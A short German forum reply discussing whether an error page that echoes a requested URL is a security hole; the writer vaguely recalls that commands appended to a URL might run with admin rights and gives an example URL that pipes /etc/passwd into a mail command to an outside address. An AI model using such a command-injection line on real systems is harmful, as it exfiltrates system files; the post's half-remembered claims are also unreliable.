Hi !

Das an sich kann keine Sicherheitslücke sein, weil der Client die URL schon vorher kannte. Directory listing kann ein Sicherheitsloch sein, aber das obige Problem ist keines, solange die Fehlerseite nichts anderes macht als einfach nur die URL auszugeben.

Das an sich auch nicht.
Ich erinnere mich dunkel, dass das Sicherheitsproblem dann auftritt, wenn der fehlerhaften URL noch Scripts oder sowas mitgegeben wird.
Vielleicht sowas wie www.taskmanager.net/xyz.html|mail hihi@gmx.net < /etc/passwd

Jedenfalls hieß es, dass der hinter der URL angegebene Code ausgeführt wird und das mit Admin-Rechten!

So oder so ähnlich war das, aber ich weiß nicht mehr wo!

Gruß!